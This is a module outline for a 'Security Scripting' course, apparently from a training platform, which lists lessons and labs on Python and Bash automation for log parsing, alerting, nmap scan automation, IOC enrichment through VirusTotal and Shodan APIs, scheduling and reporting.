Security Scripting
Automate security tasks with Python and Bash: scanning, parsing, alerting, and response.
1. Python for Security Basics
Virtualenv, requests, json, argparse, and working with APIs.
3. Log Parsing and Alerting
Parse syslog, auth logs; detect anomalies; send alerts (Slack/Email).
4. Lab: Build a Log Monitor
Create a script to tail logs, detect patterns, and alert.
5. Network Scanning Automation
Automate nmap scans, parse results, and generate reports.
6. Lab: Automated Recon Tool
Build a recon script that collects host info and open ports.
7. API Integrations
Use VirusTotal/Shodan APIs, rate limiting, and error handling.
8. Assignment: Incident Helper
Build a script to enrich IOCs and summarize findings.
10. Python Data Structures for Security Automation
Use lists, dictionaries, sets, and tuples effectively for IOC handling and parsing workflows.
11. Regular Expressions for Threat Detection
Build regex patterns to detect suspicious indicators in logs with precision and fewer false positives.
12. Lab: Regex-Based IOC Detection
Write and test regex patterns for hashes, IPs, domains, and suspicious command patterns.
13. Parsing Structured and Unstructured Logs
Process JSON, CSV, and plain-text logs while handling malformed records safely.
14. Error Handling and Resilient Script Design
Design scripts with retries, timeouts, exception management, and safe fallback behavior.
15. Lab: Fault-Tolerant Parser Build
Implement a robust log parser that survives malformed data and outputs useful diagnostics.
16. Secure API Authentication Patterns
Handle API tokens and credentials securely while avoiding accidental exposure in code and logs.
17. Rate Limiting and Backoff Strategies
Implement request throttling and backoff logic to build stable integrations with external APIs.
18. Lab: API Enrichment Pipeline
Build a pipeline that enriches indicators using an API and stores structured results.
19. Automation with Cron and Schedulers
Run scripts on schedule with proper logging, health checks, and failure alerts.
20. Secure Script Packaging and Deployment
Package scripts with configs, environment variables, and secure defaults for repeatable operations.
21. Lab: Scheduled Security Jobs
Configure recurring security scripts with logs, notifications, and rollback planning.
22. Report Generation and Analyst Output
Generate clear machine + human-readable security reports from script output data.
23. Lab: Build Security Dashboard Feed
Transform script outputs into structured summaries for SOC consumption.
24. Testing and QA for Security Scripts
Use unit tests and scenario-based tests to reduce script failures in production workflows.
25. Capstone: Security Automation Toolkit
Deliver a complete toolkit that automates data collection, enrichment, analysis, alerting, and reporting.